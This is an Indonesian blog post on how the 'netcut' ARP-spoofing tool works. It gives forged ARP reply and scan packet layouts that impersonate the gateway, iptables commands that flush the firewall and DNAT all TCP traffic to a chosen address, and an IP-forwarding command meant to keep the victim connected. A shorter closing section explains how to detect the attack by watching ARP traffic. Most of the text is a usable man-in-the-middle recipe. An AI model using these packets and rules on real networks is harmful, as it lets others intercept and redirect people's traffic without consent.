-->

Belajar Cara kerja netcut

Belajar Cara kerja netcut.
Netkat algorithm by RedFoX

#UNTUK Spoof
ARP PACKET
****************_ETHERNET_FRAME_****************
Dest/Broadcast MAC: ac9e172c2adf #TARGET MAC
Source MAC: 00082278ac58 # MAC mu
Type: 0806
************************************************
******************_ARP_HEADER_******************
Hardware type: 0001
Protocol type: 0800
Hardware size: 06
Protocol size: 04
Opcode: 0002 # REPLY
Source MAC: 00082278ac58 #MAC mu
Source IP: 192.168.1.1 # GATEWAY IP
Dest MAC: ffffffffffff # BROADCAST MAC
Dest IP: 0.0.0.0 # LOCAL IP
*************************************************
#SCAN MAC
ARP PACKET
****************_ETHERNET_FRAME_****************
Dest/Broadcast MAC: ffffffffffff
Source MAC: 00082278ac58 # MAC mu
Type: 0806
************************************************
******************_ARP_HEADER_******************
Hardware type: 0001
Protocol type: 0800
Hardware size: 06
Protocol size: 04
Opcode: 0001 # REQUEST
Source MAC: 00082278ac58 # MAC mu
Source IP: 192.168.1.129 # IP mu
Dest MAC: 000000000000 # LOCAL MAC
Dest IP: 192.168.1.x # x adalah 1-255 -> IP TARGET
*************************************************
# RULES NETKAT
iptables -F
iptables -t nat -F
iptables -t nat -I PREROUTING -p tcp -s 0/0 -d 0/0 -j DNAT --to-destination 172.168.1.1
iptables -t nat -A POSTROUTING -s 0/0 -d 0/0 -j MASQUERADE
# 172.168.1.1 ubah dengan alamat tujuan target
IPTABLES print out
bles -t nat -L <
Chain PREROUTING (policy ACCEPT)
target prot opt source destination 
protoent* getprotobynumber(int)(3) is not implemented on Android
DNAT tcp -- anywhere anywhere to:172.168.1.1
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
Chain POSTROUTING (policy ACCEPT)
target prot opt source destination 
MASQUERADE all -- anywhere anywhere
Chain natctrl_nat_POSTROUTING (0 references)
target prot opt source destination
Chain oem_nat_pre (0 references)
target prot opt source destination
Jangan lupa aktifkan IP forwarding biar target gak lepas:
echo 1 > /proc/sys/net/ipv4/ip_forward
Cara mendeteksi pengguna netkat:
dia akan menyiarkan paket ARP secara berulang kali untuk memberitahukan sebuah host bahwa dialah ROUTERNYA.
caranya mudah, jalankan file arpmon.py
dan perhatikan bagian:
Source mac, Source IP, dan Dest IP.
jika:
Source mac tetap
Source IP adalah IP Gateway
dan Dest IP berubah ubah
maka bisa dipastikan ada yg menggunakan netkat.
dan penyerangnya beralamatkan Source MAC.
Untuk anti netkat nya nanti ane coba buatin :)
atau buat sendiri juga bisa 
Bahaya dari spoofing jenis ini adalah:
penyerang dapat menyadap semua lalu lintas di dalam jaringan :O
Kecuali kalo pake HTTPS.
tapi ada juga yg bisa mem-break HTTPS 
#cheers~ Grats: FA2AS

Related Posts:

Disqus Comments

Popular

Newsletter

Your Ads Here

The Best Article

© 2017 Ember Dunia - Template Created by goomsite - Proudly powered by Blogger